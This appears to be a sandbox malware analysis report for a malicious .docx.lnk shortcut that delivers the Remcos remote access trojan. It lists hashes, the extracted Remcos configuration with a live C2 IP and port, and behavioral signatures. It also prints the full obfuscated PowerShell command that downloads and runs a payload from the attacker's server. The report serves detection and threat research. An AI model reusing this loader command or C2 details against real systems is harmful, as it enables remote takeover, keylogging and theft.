Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1brt_1_0147.doc.lnk
windows7-x64
3brt_1_0147.doc.lnk
windows10-2004-x64
10oshad_88.docx.lnk
windows7-x64
3oshad_88.docx.lnk
windows10-2004-x64
10rv_luti_20...sx.lnk
windows7-x64
3rv_luti_20...sx.lnk
windows10-2004-x64
10telegrama_...pg.lnk
windows7-x64
3telegrama_...pg.lnk
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
31/08/2024, 01:02
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
brt_1_0147.doc.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
oshad_88.docx.lnk
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
oshad_88.docx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
telegrama_ksv_po_btgr.jpg.lnk
Resource
win7-20240729-en
General
-
Target
oshad_88.docx.lnk
-
Size
15KB
-
MD5
b8fb0340c7a12ae9d4a3847ac14308cb
-
SHA1
4675f3d8a12942068e609fd2f12f2f020fe5762e
-
SHA256
a2bfa5db078137d391b392758fca56b34c8d3c9b0a7e23b1ba9fa9a2edf91000
-
SHA512
d9504ca3211e14412ba697d43983e21d100143c5a68be1799e74a704ac76ee6dc999aef09bcd10fb87b9b975bd8184815b6fc2e90ebd96e4f737244a6546d6b0
-
SSDEEP
48:88muavUQSEfFy63YMEDo/atNixCyQvGDDo/DBdCZZGXu/dZZIa7x:88y8GFy63hXEIxCyQ/zuqQ
Malware Config
Extracted
remcos
feetfuck
83.222.191.201:24251
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-XTJ1YO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 404 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 5068 Newfts.exe 4972 Newfts.exe -
Loads dropped DLL 8 IoCs
pid Process 5068 Newfts.exe 5068 Newfts.exe 5068 Newfts.exe 5068 Newfts.exe 4972 Newfts.exe 4972 Newfts.exe 4972 Newfts.exe 4972 Newfts.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4972 set thread context of 4568 4972 Newfts.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Newfts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Newfts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3812 WINWORD.EXE 3812 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 404 powershell.exe 404 powershell.exe 5068 Newfts.exe 4972 Newfts.exe 4972 Newfts.exe 4568 cmd.exe 4568 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4972 Newfts.exe 4568 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 404 powershell.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 3812 WINWORD.EXE 3812 WINWORD.EXE 3812 WINWORD.EXE 3812 WINWORD.EXE 3812 WINWORD.EXE 3812 WINWORD.EXE 3812 WINWORD.EXE 3812 WINWORD.EXE 3812 WINWORD.EXE 3812 WINWORD.EXE -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 2992 wrote to memory of 404 2992 cmd.exe 85 PID 2992 wrote to memory of 404 2992 cmd.exe 85 PID 404 wrote to memory of 5068 404 powershell.exe 96 PID 404 wrote to memory of 5068 404 powershell.exe 96 PID 404 wrote to memory of 5068 404 powershell.exe 96 PID 404 wrote to memory of 3812 404 powershell.exe 97 PID 404 wrote to memory of 3812 404 powershell.exe 97 PID 5068 wrote to memory of 4972 5068 Newfts.exe 98 PID 5068 wrote to memory of 4972 5068 Newfts.exe 98 PID 5068 wrote to memory of 4972 5068 Newfts.exe 98 PID 4972 wrote to memory of 4568 4972 Newfts.exe 99 PID 4972 wrote to memory of 4568 4972 Newfts.exe 99 PID 4972 wrote to memory of 4568 4972 Newfts.exe 99 PID 4972 wrote to memory of 4568 4972 Newfts.exe 99 PID 4568 wrote to memory of 624 4568 cmd.exe 107 PID 4568 wrote to memory of 624 4568 cmd.exe 107 PID 4568 wrote to memory of 624 4568 cmd.exe 107 PID 4568 wrote to memory of 624 4568 cmd.exe 107 PID 4568 wrote to memory of 624 4568 cmd.exe 107
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\oshad_88.docx.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo sviYiTDifmVgwUmQzFgOPYIV; echo JzJdBqRYxLImYrcCLbpdqvjXsIJfpWlZfWY; echo ZKgorOmcNJZZMbukHvugkdfvZrLIe; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo SRChLBIQjesWVTeXbGypCUPpLnWGEpbzmlAuNYge; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo tAtLAczHKJaDGfRcGQexTEXSHDzsHxFvifZtnswW; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/oshad_88.docx -OutFile oshad_88.docx; echo SQwXgOGQnSfQxMfeOlQMGbil; s''t''a''rt oshad_88.docx2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exeC:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
PID:624
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\oshad_88.docx" /o ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3812
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.2MB
MD53115302e2b5fe948bc1688f640c95f04
SHA12a4c6da043fd62311f7e0be9386a61d950c0d8f1
SHA256e17d46519af0013d5d98cfccbe48067f194c75bab3a6abe570045a2b26c433be
SHA512c7a026fffe3e8c55de78b482e6aebecc5fce7b2703b1ad0a890f70d76f965c4f95acff78bbff0427492fc466af7c8d66fe85c8cb40ddc2c051f6b0868a91ea76
-
Filesize
405B
MD576aef0f3b84edde82ebcd68680836ee4
SHA1b3e649d6ca499d05ad8f498d805d911304f2db8f
SHA256e1ad71ad7b8fe9b523d3efcf2e389391432f5eee6387583a758bd76ca0bc9487
SHA51258a39f935074cac4fa7e427343717dd6f0a1a62b1f4eb97e3a2054cbf0d52a2b2d1f49bcfd2c6ee3841326ec272795e1665df701a97e88773eb720a2886692d8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize3KB
MD5f82d947e42dcaa7a325b10d6f4affa41
SHA1d4bdf3ceb8db07786da82359d5fddd7ff8945878
SHA256915eb03548d9c37df4261747b03c8a8cd545d3249a09188379f40c71a5dc5179
SHA51230e60445f8cd4b21bfe0f45bb9db26971c363a6bfb8b2aa573750b17002c27c357a6fcb5c15e4d866afd122aa0c0e924a3c0c69fca3b879ba78f35617b7b9f2a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize4KB
MD538b2ee31d14be5eda8b801aca218356b
SHA19789daefb6a05af310243c5d815b79bcb302599e
SHA256fe4ce08aa8169b34b39073eb9fd3d8b0d8daf4306bde42a878a27faba8914b63
SHA5127cda57ecff74d4eeeb52df7675bb7e240da72884fb9bd0449069742871e492659d459404e8908e20c84e877e6a6055e6bb269ff182abec33fbf7dcc61b1524e6
-
Filesize
2.1MB
MD5db7e67835fce6cf9889f0f68ca9c29a9
SHA15565afda37006a66f0e4546105be60bbe7970616
SHA256dbd3057a58fd3407c95418bc5d9c253adc8c658ee338f22d58374ed3ea37b738
SHA512bc2714bb408715e5e1cec1337b831e26dbda208183955a07ec8653a38c9c0f25f60f333a154b738927ce085e7bbff438963b941a6c2773b3e7325cd900e7651b
-
Filesize
1.1MB
MD559c15c71fd599ff745a862d0b8932919
SHA18384f88b4cac4694cf510ca0d3f867fd83cc9e18
SHA256c4ed07ad748661ce776ac6ebb4f8bef7619586bfb4443ce58c92d4b889f3d5c2
SHA512be3425d55dcaa361bc8481b87b2086454baca79a3c948de9acf9ef7d3084d6d987c328d665b45dfcd0510e2c97c980aa63d7cd669fe9fc1a67983c325593481e
-
Filesize
1.4MB
MD56fdb2e9ca6b7a5ad510e2b29831e3bc8
SHA14a14ee9d5660eb271a6b5f18a55ac3e05f952c68
SHA256f510c85b98fa6fe8d30133114a34b7f77884aa58e57a0561722eeb157dc98a38
SHA512d5248dd902d862afa060ab829fc3a39dccc26dab37737e14a3f9b90b1d3f900b3bf5821f450502a2124016acf0e84bd8979758827a92741f879b2fa4addfda06
-
Filesize
31KB
MD55dc69a3e2fda6cb740f363ef77edcc13
SHA1c177fabf17346531e07d562be11915bf2822148a
SHA2567c24abda04537749bfb1b2d2aa57a7c9261f41012435269347f7eb2d05f71621
SHA512b32848b6eded965245b759be1b72b6fc81acb4002eceae96004e88e549e21eb6eb1ceb3e51f6249d7dfb739f31223e623f7c525f677939bc935d2f6bffb50a9f
-
Filesize
1.0MB
MD5471076308d78944d45ab35d37134134a
SHA105cf2cf6e5d11ce10425b14d68cda3246cc47263
SHA25638d10ba2f4411eba8351d5b3fed74ca46bf856569dca757d055eb49d8471e11b
SHA5127f140546ceda85d3c178a61689a0743c75623b7d1e2dcc3e2d29128d7e13d9671cdb660ca46312dbd8ff3d63c12836caf1a6a54c074d66bed269184044bdd9c3
-
Filesize
15KB
MD535a1aa0fc4972286c1db07e513c3abbc
SHA189f5e48e02a03978cd7931651518472c38a7b272
SHA256be338409f57304177e56712593a9345b54d8361ef1fdc767a2fc683a6508cb4e
SHA512f111c86ea937763d091ed195507ee9b3bc95854e22bf31142a9e96bdeb5c273f91f803ea463f8296d5ce611de3a9d959e993fbc03261022a074a203d14ad29c4